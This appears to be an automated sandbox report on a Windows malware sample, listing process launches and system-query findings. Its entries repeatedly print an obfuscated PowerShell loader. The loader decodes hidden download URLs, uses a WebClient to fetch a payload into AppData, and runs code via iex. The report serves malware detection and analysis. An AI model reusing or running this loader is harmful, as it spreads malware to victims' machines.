Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0 revisoratets207 smaatrykkene forlise sujet udvandringerne wadies thioantimonious unparalysed whiffer masseproduceres entings hebenon zymin dumpningsskibes reobtainment allingeboens zinkkografierne checksums reverbrate phare spisekkkens programredaktrs heteromorphous sparkedragten0';if (${host}.currentculture) {$digers++;}function svndyssendes94($dukketeatrenes){$uadskilleligt=$dukketeatrenes.length-$digers;$mainlining='substr';$mainlining+='ing';for( $truthsman=1;$truthsman -lt $uadskilleligt;$truthsman+=2){$revisoratets207+=$dukketeatrenes.$mainlining.invoke( $truthsman, $digers);}$revisoratets207;}function scance($strukturndringernes){ . ($gederamsen) ($strukturndringernes);}$ambages77=svndyssendes94 ' mio zgi lkl,al/c5f. 0r (.w isn d o,wos bnqt. r1 0,.v0p; ,w ibno6 4d;s uxy6 4m;, ,rsvm:t1 2.1..p0c) sgbehc k o,/b2 0o1 0 0 1,0b1f if i.rbenf,ohxc/e1 2a1 .u0b ';$slotting=svndyssendes94 '.utsue r.-fa g ern,ti ';$udvandringerne=svndyssendes94 ' h tttjpasa: /e/kaps,odc.i art i.a t r.ald,i tgi.i m aarsi a...r o,/gols /,t r adn.s.p o.rbtem e,nnt...pafpmm> hst t phs,:p/ /,n.e.w ..qcupr alngu s hbaei qge r . oerfg..,s a./ wmpc- a.d m.iknd/tons,e rcvde /rtdr,a nps.pro.r.tsm.e n tg. phftmi ';$fluffs=svndyssendes94 's> ';$gederamsen=svndyssendes94 'pi,e x ';$lgnere='unparalysed';$decos = svndyssendes94 'ee cmh,os % a p ptdaastsa % \fs n i g m ymr,dje dpea. sfkso. ,& &h fedc h.ou t ';scance (svndyssendes94 ',$ g lho boaalc:prge.gfr =h( c m,d, /vc, .$ d.e.cbobs,). ');scance (svndyssendes94 'e$sgelfo b.a lr:cs ulj.eft,=s$sutdkvfa,n,dirdion.gselr,nse .hsapglai tb( $ fjl.uofnf.sd)p ');scance (svndyssendes94 ',[bn e,t .cs eorhvli.cve pso inn.tsmcacn,aogaekr,]s:d:ospepc upr.ikt y pdrcobt o,cfool i=. c[snnelt ..s ebchu rui.t ympmrmo.tko,c o l.tvygp e ]n:f:vtrl sr1f2e ');$udvandringerne=$sujet[0];$respriser= (svndyssendes94 ',$.gil.o brablp: y m c a = n eiw -.olb jbemc t, s.yesct,e mh.rnuesth.mw e.brckl i,e.nmt');$respriser+=$regr[1];scance ($respriser);scance (svndyssendes94 'a$ ydm.c,a .uhuemapd.e rssa[ $fsjlio trt,i nkgp]d=,$oa,mtbfasg e,sk7 7 ');$genlydens=svndyssendes94 's$,y,mtc,a..sd o,w nsl ofa d fsibl e.(.$fu,d v asntd r i nog.e rsnaeb,f$ piruohgar a m r.eudhauk.t r,s )b ';$programredaktrs=$regr[0];scance (svndyssendes94 ' $ g lto b a l,: smastweblsl i tp=,( tse satt-zpgadtah f$dpsr o g raa mlrae d,aak tcrms ) ');while (!$satellit) {scance (svndyssendes94 'h$bg lto,b.a lh: rie goi ocn s.p lparnvrae t n ibn gbscl i.n.j.e =,$mtcrmuaeu ') ;scance $genlydens;scance (svndyssendes94 ',s tca r,t -.ssl,eoesp .4n ');scance (svndyssendes9 Jump to behavior
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager(
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager#
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2139093397.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerK
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2169478145.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000003.2169646839.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerX@
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerai
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmp, sfvnspt.dat.0.dr Binary or memory string: [2024/07/26 09:46:57 Program Manager]
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerz"
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerS"
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerles
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, 00000000.00000002.4552464938.00000000007E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00434C52 cpuid 0_2_00434C52
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: GetLocaleInfoA, 0_2_0040F8D1
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: EnumSystemLocalesW, 0_2_00452036
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_004520C3
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: GetLocaleInfoW, 0_2_00452313
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: EnumSystemLocalesW, 0_2_00448404
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0045243C
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: GetLocaleInfoW, 0_2_00452543
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00452610
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: GetLocaleInfoW, 0_2_004488ED
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_00451CD8
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: EnumSystemLocalesW, 0_2_00451F50
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: EnumSystemLocalesW, 0_2_00451F9B
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
